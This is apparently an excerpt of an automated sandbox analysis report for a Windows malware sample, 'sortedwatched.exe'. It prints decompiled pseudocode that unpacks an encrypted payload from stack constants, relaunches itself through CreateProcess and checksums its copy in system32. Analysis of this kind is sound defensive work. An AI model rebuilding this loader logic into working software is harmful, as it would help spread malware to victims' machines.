                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				char _v1428;
                  				struct HINSTANCE__* _t359;
                  
                  				_v1428 = 0x35afd9ed;
                  				_v1424 = 0xb2bb3fd1;
                  				_v1420 = 0xc54e001f;
                  				_v1416 = 0x464bd289;
                  				_v1412 = 0xa62e3cd5;
                  				_v1408 = 0x10828f30;
                  				_v1404 = 0xd759c3e6;
                  				_v1400 = 0x3226a1eb;
                  				_v1396 = 0x93d3719f;
                  				_v1392 = 0xff1d7368;
                  				_v1388 = 0x4cf80263;
                  				_v1384 = 0x1220b21a;
                  				_v1380 = 0x9e299973;
                  				_v1376 = 0x8c93726d;
                  				_v1372 = 0x388d0cca;
                  				_v1368 = 0x63dd4a40;
                  				_v1364 = 0x63312a98;
                  				_v1360 = 0xc54ade8b;
                  				_v1356 = 0x57b31f78;
                  				_v1352 = 0xbaef0446;
                  				_v1348 = 0xa5fb8b92;
                  				_v1344 = 0x7ac55a38;
                  				_v1340 = 0xa13c21f;
                  				_v1336 = 0x77bc5b0d;
                  				_v1332 = 0x6b48a641;
                  				_v1328 = 0xc939f5fe;
                  				_v1324 = 0xf80f5b16;
                  				_v1320 = 0xc75ec705;
                  				_v1316 = 0xdba5663;
                  				_v1312 = 0x4213a67f;
                  				_v1308 = 0x3de4493c;
                  				_v1304 = 0xd6231f80;
                  				_v1300 = 0x68067b7;
                  				_v1296 = 0xc082ec40;
                  				_v1292 = 0xa5d2a512;
                  				_v1288 = 0x5f226fcb;
                  				_v1284 = 0x9a62d466;
                  				_v1280 = 0x2dcc9250;
                  				_v1276 = 0x68432153;
                  				_v1272 = 0xe57fc7e;
                  				_v1268 = 0xf9c65141;
                  				_v1264 = 0x74e9465;
                  				_v1260 = 0xa6dac4aa;
                  				_v1256 = 0x35a3c1f;
                  				_v1252 = 0xa3662753;
                  				_v1248 = 0xf78554cb;
                  				_v1244 = 0xa9ba3f97;
                  				_v1240 = 0xa7034e35;
                  				_v1236 = 0xfefc68e9;
                  				_v1232 = 0xf512b31a;
                  				_v1228 = 0x7483c20;
                  				_v1224 = 0x36b5f632;
                  				_v1220 = 0x38c31e64;
                  				_v1216 = 0x4c62f726;
                  				_v1212 = 0x99ba6132;
                  				_v1208 = 0x323bd5bb;
                  				_v1204 = 0xd06b8129;
                  				_v1200 = 0x58ac925d;
                  				_v1196 = 0x14258239;
                  				_v1192 = 0x74c7fcd7;
                  				_v1188 = 0x5b658ef1;
                  				_v1184 = 0xfef3ed92;
                  				_v1180 = 0xd6897bdd;
                  				_v1176 = 0xe3ae805d;
                  				_v1172 = 0xd7dd3c6a;
                  				_v1168 = 0xcf62f53e;
                  				_v1164 = 0x10086fbc;
                  				_v1160 = 0xb950e66;
                  				_v1156 = 0x1f978099;
                  				_v1152 = 0xa5187c45;
                  				_v1148 = 0xe4f386b;
                  				_v1144 = 0xa997fe6d;
                  				_v1140 = 0x39d08a92;
                  				_v1136 = 0xfb10c42f;
                  				_v1132 = 0x58d93c66;
                  				_v1128 = 0x4cf30038;
                  				_v1124 = 0xa31aa9f3;
                  				_v1120 = 0xa932cf52;
                  				_v1116 = 0x2451a583;
                  				_v1112 = 0xeb831842;
                  				_v1108 = 0x59b79230;
                  				_v1104 = 0x47744230;
                  				_v1100 = 0xd450fcea;
                  				_v1096 = 0x1959a718;
                  				_v1092 = 0x6585da84;
                  				_v1088 = 0xf7b8a766;
                  				_v1084 = 0xa8e739d6;
                  				_v1080 = 0x25491a58;
                  				_v1076 = 0x41855178;
                  				_v1072 = 0xae9aad57;
                  				_v1068 = 0x913a6b1b;
                  				_v1064 = 0xf5bfdaf1;
                  				_v1060 = 0xe0413efd;
                  				_v1056 = 0x2a6692be;
                  				_v1052 = 0xae364f54;
                  				_v1048 = 0xa4910d06;
                  				_v1044 = 0xac37d2e2;
                  				_v1040 = 0x1f0ed562;
                  				_v1036 = 0xf8313c8;
                  				_v1032 = 0x1696917a;
                  				_v1028 = 0x4ba4c9c6;
                  				_v1024 = 0xca70992d;
                  				_v1020 = 0x88f129d4;
                  				_v1016 = 0x8986dfc9;
                  				_v1012 = 0x8077495d;
                  				_v1008 = 0x7f188a07;
                  				_v1004 = 0x7068997b;
                  				_v1000 = 0x5f73f18e;
                  				_v996 = 0x7079116d;
                  				_v992 = 0xf12893f0;
                  				_v988 = 0x2e1e137f;
                  				_v984 = 0x9c8a1308;
                  				_v980 = 0x63f7f786;
                  				_v976 = 0x82df7bd;
                  				_v972 = 0xb3225a87;
                  				_v968 = 0xd1bde73d;
                  				_v964 = 0x59885592;
                  				_v960 = 0xc427fd32;
                  				_v956 = 0x9d169c5c;
                  				_v952 = 0x6e01ebf2;
                  				_v948 = 0x9c5f68a9;
                  				_v944 = 0x559de137;
                  				_v940 = 0x45953cbd;
                  				_v936 = 0xd84853c;
                  				_v932 = 0x65edd287;
                  				_v928 = 0xef673b85;
                  				_v924 = 0x7fa3edf8;
                  				_v920 = 0x83ba664c;
                  				_v916 = 0xac287487;
                  				_v912 = 0x4d8c6e16;
                  				_v908 = 0xd6774e7a;
                  				_v904 = 0x6a742a14;
                  				_v900 = 0x7b41d554;
                  				_v896 = 0x3583a68f;
                  				_v892 = 0xb64620eb;
                  				_v888 = 0x968e295c;
                  				_v884 = 0x1f2a9f33;
                  				_v880 = 0x20c95888;
                  				_v876 = 0x3ad04588;
                  				_v872 = 0x1f3f3349;
                  				_v868 = 0x8bc63238;
                  				_v864 = 0x72dfdb8b;
                  				_v860 = 0x3c084d40;
                  				_v856 = 0xa03b21f2;
                  				_v852 = 0x975b711;
                  				_v848 = 0x66143377;
                  				_v844 = 0xb0ef4486;
                  				_v840 = 0x9536b870;
                  				_v836 = 0xad0c8488;
                  				_v832 = 0xfa93b301;
                  				_v828 = 0x625273d4;
                  				_v824 = 0x2130da0b;
                  				_v820 = 0x21682fc7;
                  				_v816 = 0x125bacd0;
                  				_v812 = 0x8d655941;
                  				_v808 = 0x7ea7e90a;
                  				_v804 = 0x998bb919;
                  				_v800 = 0x4a680a7;
                  				_v796 = 0x4dc5c9aa;
                  				_v792 = 0x6f4d8b33;
                  				_v788 = 0xfff2694d;
                  				_v784 = 0x7ad03f4c;
                  				_v780 = 0xec728f7e;
                  				_v776 = 0xbd5f0efc;
                  				_v772 = 0x39972492;
                  				_v768 = 0x8a22d400;
                  				_v764 = 0xc9e812c9;
                  				_v760 = 0xd9c8e7;
                  				_v756 = 0x783a029e;
                  				_v752 = 0xf55a1b2b;
                  				_v748 = 0x39a441d8;
                  				_v744 = 0xfddcd3b7;
                  				_v740 = 0xa8d3ee78;
                  				_v736 = 0xb71d00d8;
                  				_v732 = 0xd8f1a5e0;
                  				_v728 = 0x171f9db;
                  				_v724 = 0x608a96cb;
                  				_v720 = 0x5db98275;
                  				_v716 = 0x8e64ca5b;
                  				_v712 = 0x8224c5bb;
                  				_v708 = 0xf3e18a45;
                  				_v704 = 0x9fa69ab2;
                  				_v700 = 0x9858a1cb;
                  				_v696 = 0x20254080;
                  				_v692 = 0xc5a28d75;
                  				_v688 = 0xa7e533b4;
                  				_v684 = 0xb3f2eb4f;
                  				_v680 = 0xf3eab420;
                  				_v676 = 0xe26b573a;
                  				_v672 = 0x36939b06;
                  				_v668 = 0xce10ed67;
                  				_v664 = 0xaa9683c0;
                  				_v660 = 0x62293a60;
                  				_v656 = 0x1d84933a;
                  				_v652 = 0xad1d5e99;
                  				_v648 = 0x85c61e4e;
                  				_v644 = 0x5b995538;
                  				_v640 = 0x8d8b2cb;
                  				_v636 = 0xa9e61fda;
                  				_v632 = 0x9cd95a2d;
                  				_v628 = 0x8a651418;
                  				_v624 = 0x98b050c0;
                  				_v620 = 0x40e286e5;
                  				_v616 = 0x1619f260;
                  				_v612 = 0xb4bdd31f;
                  				_v608 = 0xb99d071c;
                  				_v604 = 0x125c63d2;
                  				_v600 = 0x2b37c664;
                  				_v596 = 0x82586a06;
                  				_v592 = 0x68bb79f8;
                  				_v588 = 0xde917f5e;
                  				_v584 = 0x13cb2094;
                  				_v580 = 0x4e37c720;
                  				_v576 = 0x6a7f746d;
                  				_v572 = 0xd082913f;
                  				_v568 = 0xbf74de13;
                  				_v564 = 0xa80f39b0;
                  				_v560 = 0xd992575e;
                  				_v556 = 0x68739177;
                  				_v552 = 0x3f37384b;
                  				_v548 = 0x18bc988d;
                  				_v544 = 0x46cd9d63;
                  				_v540 = 0xf4719ae3;
                  				_v536 = 0xf64f55e0;
                  				_v532 = 0x87d9f1a7;
                  				_v528 = 0x8f398c60;
                  				_v524 = 0x8cb94234;
                  				_v520 = 0xbbea7dd7;
                  				_v516 = 0xb9b8b1df;
                  				_v512 = 0xaa28a9fc;
                  				_v508 = 0xf0af87ff;
                  				_v504 = 0x8dd7ca67;
                  				_v500 = 0xe2b550c4;
                  				_v496 = 0xd32bc033;
                  				_v492 = 0x948a965f;
                  				_v488 = 0x8851f930;
                  				_v484 = 0x8f5ccc1;
                  				_v480 = 0x6164f669;
                  				_v476 = 0x33510924;
                  				_v472 = 0xcb43e698;
                  				_v468 = 0x6ce52a33;
                  				_v464 = 0xa66f015c;
                  				_v460 = 0x7718680d;
                  				_v456 = 0x9d1df3bc;
                  				_v452 = 0x2a00c920;
                  				_v448 = 0x91fb3000;
                  				_v444 = 0x10c81bc3;
                  				_v440 = 0xf8a75bf2;
                  				_v436 = 0x5ae0234a;
                  				_v432 = 0xf98cf7ec;
                  				_v428 = 0x5fc46df;
                  				_v424 = 0xca1b041b;
                  				_v420 = 0x2790b2c6;
                  				_v416 = 0x54daa301;
                  				_v412 = 0x138923a3;
                  				_v408 = 0x301c0cdf;
                  				_v404 = 0x38e0a856;
                  				_v400 = 0xf03451b0;
                  				_v396 = 0x99e431f5;
                  				_v392 = 0x11281ac6;
                  				_v388 = 0xcf2342ab;
                  				_v384 = 0x9eab3b39;
                  				_v380 = 0x9ae3e3f1;
                  				_v376 = 0x1a6c98f3;
                  				_v372 = 0x68813b1b;
                  				_v368 = 0x192d795a;
                  				_v364 = 0x40d247a5;
                  				_v360 = 0x72cd97b3;
                  				_v356 = 0x67b5cebb;
                  				_v352 = 0x72e3ccbf;
                  				_v348 = 0x6f4c2d5b;
                  				_v344 = 0x9e6a8356;
                  				_v340 = 0x49e92bba;
                  				_v336 = 0x4f743d77;
                  				_v332 = 0x153393e1;
                  				_v328 = 0x13614add;
                  				_v324 = 0x69ce03ee;
                  				_v320 = 0x854a7485;
                  				_v316 = 0x3d8d4e01;
                  				_v312 = 0x326ab68;
                  				_v308 = 0x1099a027;
                  				_v304 = 0xf0ad3f63;
                  				_v300 = 0xef67c339;
                  				_v296 = 0x48f2e773;
                  				_v292 = 0x20c73ca2;
                  				_v288 = 0x3ce286cb;
                  				_v284 = 0xc256b288;
                  				_v280 = 0x5313123f;
                  				_v276 = 0x298713bc;
                  				_v272 = 0xa00fff1e;
                  				_v268 = 0x712c154;
                  				_v264 = 0x8dfdabca;
                  				_v260 = 0x1b118de3;
                  				_v256 = 0x41128fd1;
                  				_v252 = 0x6de2b7e3;
                  				_v248 = 0x5024cd33;
                  				_v244 = 0x6abdc573;
                  				_v240 = 0x1c49177e;
                  				_v236 = 0x21386a4d;
                  				_v232 = 0x93f5651f;
                  				_v228 = 0xc73e8d48;
                  				_v224 = 0x3cac36f9;
                  				_v220 = 0x2d121512;
                  				_v216 = 0xa1b212f1;
                  				_v212 = 0x9129c71a;
                  				_v208 = 0x4db0cfdf;
                  				_v204 = 0xd654f2c6;
                  				_v200 = 0x16901ffd;
                  				_v196 = 0x81f89533;
                  				_v192 = 0x1b05c4c7;
                  				_v188 = 0x5eca920e;
                  				_v184 = 0x7724293;
                  				_v180 = 0x500c8610;
                  				_v176 = 0x55e5490d;
                  				_v172 = 0x62084e15;
                  				_v168 = 0xcf1eef0a;
                  				_v164 = 0xc774a676;
                  				_v160 = 0xae26a56e;
                  				_v156 = 0xcd297ae8;
                  				_v152 = 0x4142669a;
                  				_v148 = 0x7a1cc234;
                  				_v144 = 0x9b8e60b1;
                  				_v140 = 0xb4c16bb9;
                  				_v136 = 0x346d9962;
                  				_v132 = 0x84307aeb;
                  				_v128 = 0x7110f065;
                  				_v124 = 0x6a478088;
                  				_v120 = 0x5dc95d88;
                  				_v116 = 0x7073454d;
                  				_v112 = 0xacd929e4;
                  				_v108 = 0xde22b221;
                  				_v104 = 0x16e6327;
                  				_v100 = 0x9149dc8;
                  				_v96 = 0xe2880d33;
                  				_v92 = 0x2b179b1c;
                  				_v88 = 0xdea65404;
                  				_v84 = 0xf8875bcd;
                  				_v80 = 0x4b33baa9;
                  				_v76 = 0xb8f51a63;
                  				_v72 = 0x100f3977;
                  				_v68 = 0x86e5080f;
                  				_v64 = 0x39c92f99;
                  				_v60 = 0xd5b96d4e;
                  				_v56 = 0x4c99974;
                  				_v52 = 0x32225531;
                  				_v48 = 0xe94abe7a;
                  				_v44 = 0x45a4729;
                  				_v40 = 0xe5478378;
                  				_v36 = 0x67de8f40;
                  				_v32 = 0x9ef8aa84;
                  				_v28 = 0xb07d4bc5;
                  				_v24 = 0xa2696d4;
                  				_v20 = 0x57bd9265;
                  				_v16 = 0x5cb55045;
                  				_v12 = 0x686aeb99;
                  				_v8 = 0xd8fb779c;
                  				_t367 = E00401A52(0x412830, 0x72fc3a35);
                  				_t359 = LoadLibraryW(_t358); // executed
                  				 *0x416500 = _t359;
                  				L00401B09(_t367);
                  				_push(0x415f50);
                  				_push(0x15bf801c);
                  				return E004012FF( *0x416500,  &_v1428, 0x164);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040C459
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: IU$$Q3$0BtG$1U"2$3*l$8$:Wk$<I=$J#Z$K87?$MEsp$Mj8!$S!Ch$[-Lo$`:)b$w=tO
                  • API String ID: 1029625771-1041004230
                  • Opcode ID: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction ID: 9a6b7aac7a66a4a18d8d0bcd4942d35e4a44c5d677b151ec7ad78da889033333
                  • Opcode Fuzzy Hash: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction Fuzzy Hash: FD52A5F48567698BDB618F459E897CEBA74BB11304FA096C8C25D3B214CB740BC6CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 91%
                  			_entry_() {
                  				char _v20;
                  				short _v540;
                  				short _v1060;
                  				void* _t15;
                  				int _t21;
                  				WCHAR* _t25;
                  				void* _t38;
                  				WCHAR* _t39;
                  				WCHAR* _t43;
                  
                  				E0040CACE();
                  				E0040DB84();
                  				GetModuleFileNameW(0,  &_v1060, 0x104);
                  				_t15 = E00401144( &_v1060);
                  				_t38 = E00401A52(0x4129a0, 0x72fc3a35);
                  				 *0x4143a4( &_v540, 0x104, _t38, _t15);
                  				_t32 = _t38;
                  				L00401B09(_t38);
                  				_t39 = GetCommandLineW();
                  				_t21 = lstrlenW(_t39);
                  				_t43 =  &(_t39[_t21 - lstrlenW( &_v540)]);
                  				while(_t39 <= _t43) {
                  					_t25 = lstrcmpiW(_t39,  &_v540); // executed
                  					__eflags = _t25;
                  					if(__eflags != 0) {
                  						_t39 =  &(_t39[1]);
                  						__eflags = _t39;
                  						continue;
                  					}
                  					E0040C84E(0x104, _t32, _t39, __eflags); // executed
                  					ExitProcess(0);
                  				}
                  				E00401CC2( &_v1060,  &_v540, _t32,  &_v20);
                  				ExitProcess(0);
                  			}

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F097
                  • _snwprintf.NTDLL ref: 0040F0C5
                  • GetCommandLineW.KERNEL32 ref: 0040F0D5
                  • lstrlenW.KERNEL32(00000000), ref: 0040F0DE
                  • lstrlenW.KERNEL32(?), ref: 0040F0ED
                  • lstrcmpiW.KERNEL32(00000000,?), ref: 0040F102
                  • ExitProcess.KERNEL32 ref: 0040F113
                    • Part of subcall function 00401CC2: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • ExitProcess.KERNEL32 ref: 0040F13A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleName_snwprintflstrcmpi
                  • String ID: g8Cw
                  • API String ID: 4243820956-3103284439
                  • Opcode ID: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction ID: 96f63cbf6c12603b9eafb981d3b8471d0b236fe68b2e75c18f179b1aecd08856
                  • Opcode Fuzzy Hash: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction Fuzzy Hash: 5F118472600118ABD710AB65DC89AFF377CEB40349F00417AF505A7192EE346E458BA9
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040F3C5() {
                  				void* _t1;
                  				void* _t2;
                  				int _t3;
                  				void* _t4;
                  				void* _t10;
                  				void* _t12;
                  				void* _t14;
                  
                  				_t1 = CreateFileW("C:\Windows\system32\sortedwatched.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
                  				_t14 = _t1;
                  				if(_t14 != 0xffffffff) {
                  					_t2 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0); // executed
                  					_t12 = _t2;
                  					if(_t12 != 0) {
                  						_t4 = MapViewOfFile(_t12, 4, 0, 0, 0); // executed
                  						_t10 = _t4;
                  						if(_t10 != 0) {
                  							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
                  							UnmapViewOfFile(_t10);
                  						}
                  						CloseHandle(_t12); // executed
                  					}
                  					_t3 = CloseHandle(_t14); // executed
                  					return _t3;
                  				}
                  				return _t1;
                  			}

                  APIs
                  • CreateFileW.KERNEL32(C:\Windows\system32\sortedwatched.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNEL32(00000000), ref: 0040F42D
                  • CloseHandle.KERNEL32(00000000), ref: 0040F434
                  Strings
                  • C:\Windows\system32\sortedwatched.exe, xrefs: 0040F3D5
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 3664593344-2966989349
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040F3C5() {
                  				void* _t1;
